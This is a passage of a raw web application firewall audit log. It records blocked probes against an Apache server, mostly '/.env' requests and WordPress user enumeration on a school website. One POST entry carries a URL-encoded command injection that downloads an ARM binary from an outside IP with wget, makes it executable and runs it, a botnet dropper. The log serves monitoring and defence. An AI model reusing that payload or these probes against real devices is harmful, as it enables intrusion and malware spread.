Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bcf3cb1b-Z-- --95ca5353-A-- [24/May/2025:04:43:00 +0700] aDDr5DvI5DIWBJ2mFG7NwQAAAMc 103.236.140.4 43876 103.236.140.4 8181 --95ca5353-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3889.0 Safari/537.36 Accept-Charset: utf-8 --95ca5353-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --95ca5353-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748036580198879 863 (- - -) Stopwatch2: 1748036580198879 863; combined=314, p1=276, p2=0, p3=0, p4=0, p5=38, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95ca5353-Z-- --d433cf5f-A-- [24/May/2025:04:45:35 +0700] aDDsf_mzt4abyoi_U9lwTwAAAII 103.236.140.4 44262 103.236.140.4 8181 --d433cf5f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 62.210.185.4 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 62.210.185.4 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d433cf5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d433cf5f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748036735525173 3294 (- - -) Stopwatch2: 1748036735525173 3294; combined=1345, p1=454, p2=861, p3=0, p4=0, p5=29, sr=89, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d433cf5f-Z-- --2193fe3a-A-- [24/May/2025:04:47:19 +0700] aDDs5_mzt4abyoi_U9lwUQAAAIM 103.236.140.4 44268 103.236.140.4 8181 --2193fe3a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 34.76.253.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 34.76.253.27 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2193fe3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2193fe3a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748036839342702 2847 (- - -) Stopwatch2: 1748036839342702 2847; combined=1300, p1=428, p2=842, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2193fe3a-Z-- --ff2eb604-A-- [24/May/2025:05:08:36 +0700] aDDx5Pmzt4abyoi_U9lwbgAAAJU 103.236.140.4 44438 103.236.140.4 8181 --ff2eb604-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.147.185.248 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.147.185.248 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --ff2eb604-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ff2eb604-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748038116654342 916 (- - -) Stopwatch2: 1748038116654342 916; combined=404, p1=362, p2=0, p3=0, p4=0, p5=42, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff2eb604-Z-- --266ba142-A-- [24/May/2025:05:08:37 +0700] aDDx5TvI5DIWBJ2mFG7N3QAAAMw 103.236.140.4 44442 103.236.140.4 8181 --266ba142-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.147.185.248 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.147.185.248 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --266ba142-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --266ba142-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748038117532097 713 (- - -) Stopwatch2: 1748038117532097 713; combined=283, p1=249, p2=0, p3=0, p4=0, p5=33, sr=88, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --266ba142-Z-- --66a13974-A-- [24/May/2025:05:19:38 +0700] aDD0euO2UzDOKMmK0i4vbwAAABQ 103.236.140.4 44494 103.236.140.4 8181 --66a13974-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 89.121.140.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 89.121.140.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --66a13974-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66a13974-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748038778778657 2888 (- - -) Stopwatch2: 1748038778778657 2888; combined=1285, p1=419, p2=836, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66a13974-Z-- --1c546300-A-- [24/May/2025:05:41:14 +0700] aDD5ivmzt4abyoi_U9lwhAAAAIw 103.236.140.4 44570 103.236.140.4 8181 --1c546300-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.137.134.8 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.137.134.8 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1c546300-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c546300-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748040074178565 2306 (- - -) Stopwatch2: 1748040074178565 2306; combined=957, p1=317, p2=621, p3=0, p4=0, p5=19, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c546300-Z-- --81eb6663-A-- [24/May/2025:05:44:19 +0700] aDD6Q_mzt4abyoi_U9lwjAAAAIA 103.236.140.4 44586 103.236.140.4 8181 --81eb6663-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0 Accept-Charset: utf-8 --81eb6663-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81eb6663-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748040259486937 793 (- - -) Stopwatch2: 1748040259486937 793; combined=327, p1=289, p2=0, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81eb6663-Z-- --9650565d-A-- [24/May/2025:05:47:17 +0700] aDD69fmzt4abyoi_U9lwkAAAAIg 103.236.140.4 44602 103.236.140.4 8181 --9650565d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 204.48.19.8 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 204.48.19.8 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; vivo 1726) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36 Accept-Charset: utf-8 --9650565d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9650565d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748040437468532 842 (- - -) Stopwatch2: 1748040437468532 842; combined=366, p1=327, p2=0, p3=0, p4=0, p5=38, sr=121, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9650565d-Z-- --4fda690a-A-- [24/May/2025:05:47:39 +0700] aDD7C_mzt4abyoi_U9lwkQAAAIY 103.236.140.4 44604 103.236.140.4 8181 --4fda690a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 204.48.19.8 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 204.48.19.8 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept-Charset: utf-8 --4fda690a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4fda690a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748040459018649 870 (- - -) Stopwatch2: 1748040459018649 870; combined=364, p1=303, p2=0, p3=0, p4=0, p5=61, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4fda690a-Z-- --e5d07c3f-A-- [24/May/2025:05:57:21 +0700] aDD9UeO2UzDOKMmK0i4vmgAAABM 103.236.140.4 45740 103.236.140.4 8181 --e5d07c3f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.22.212.94 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.22.212.94 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS) (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html) Accept-Charset: utf-8 --e5d07c3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e5d07c3f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748041041566342 891 (- - -) Stopwatch2: 1748041041566342 891; combined=344, p1=301, p2=0, p3=0, p4=0, p5=43, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5d07c3f-Z-- --3f344a5c-A-- [24/May/2025:06:12:07 +0700] aDEAxzvI5DIWBJ2mFG7OiwAAAMw 103.236.140.4 45836 103.236.140.4 8181 --3f344a5c-B-- GET / HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 166.108.238.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 166.108.238.236 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0 Proxy-Connection: close --3f344a5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f344a5c-H-- Message: Access denied with code 403 (phase 2). Matched phrase "/Proxy-Connection/" at TX:header_name. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "33"] [id "210740"] [rev "2"] [msg "COMODO WAF: HTTP header is restricted by policy||smkn22-jkt.sch.id|F|4"] [data "/Proxy-Connection/"] [severity "WARNING"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748041927852363 3218 (- - -) Stopwatch2: 1748041927852363 3218; combined=1177, p1=538, p2=550, p3=0, p4=0, p5=89, sr=141, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f344a5c-Z-- --5ead9a25-A-- [24/May/2025:06:25:25 +0700] aDED5eunkxaVeh4NwhZZggAAAEc 103.236.140.4 46002 103.236.140.4 8181 --5ead9a25-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.178.114.226 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.178.114.226 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5ead9a25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ead9a25-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748042725054614 3571 (- - -) Stopwatch2: 1748042725054614 3571; combined=1492, p1=493, p2=961, p3=0, p4=0, p5=38, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ead9a25-Z-- --c0050b6c-A-- [24/May/2025:06:28:09 +0700] aDEEiTvI5DIWBJ2mFG7OjwAAANA 103.236.140.4 46018 103.236.140.4 8181 --c0050b6c-B-- POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20neon.arm7%3B%20wget%20http%3A%2F%2F209.141.34.106%2Fdwrioej%2Fneon.arm7%3B%20chmod%20777%20neon.arm7%3B%20.%2Fneon.arm7%20router1 HTTP/1.0 Host: 103.236.140.4 Cookie: uid=1 X-Real-IP: 176.65.148.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.148.236 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozila/5.0 --c0050b6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0050b6c-H-- Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||103.236.140.4|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748042889233528 894 (- - -) Stopwatch2: 1748042889233528 894; combined=380, p1=333, p2=0, p3=0, p4=0, p5=47, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0050b6c-Z-- --e7840355-A-- [24/May/2025:06:43:45 +0700] aDEIMeO2UzDOKMmK0i4vwwAAAA4 103.236.140.4 46200 103.236.140.4 8181 --e7840355-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.39.139.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.39.139.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e7840355-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7840355-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748043825595763 3518 (- - -) Stopwatch2: 1748043825595763 3518; combined=1536, p1=549, p2=955, p3=0, p4=0, p5=32, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7840355-Z-- --3d166708-A-- [24/May/2025:07:02:38 +0700] aDEMnvmzt4abyoi_U9lx9wAAAI8 103.236.140.4 46376 103.236.140.4 8181 --3d166708-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 178.18.250.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.18.250.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3d166708-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d166708-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748044958312594 3258 (- - -) Stopwatch2: 1748044958312594 3258; combined=1402, p1=439, p2=932, p3=0, p4=0, p5=30, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d166708-Z-- --b8e1c87f-A-- [24/May/2025:07:43:09 +0700] aDEWHeO2UzDOKMmK0i4wTgAAABQ 103.236.140.4 49834 103.236.140.4 8181 --b8e1c87f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.136.192.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.136.192.166 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b8e1c87f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8e1c87f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748047389754251 3388 (- - -) Stopwatch2: 1748047389754251 3388; combined=1445, p1=491, p2=921, p3=0, p4=0, p5=33, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8e1c87f-Z-- --4e201672-A-- [24/May/2025:07:56:51 +0700] aDEZUzvI5DIWBJ2mFG7Q6gAAAMo 103.236.140.4 49956 103.236.140.4 8181 --4e201672-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.84.79.86 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.84.79.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4e201672-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e201672-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag 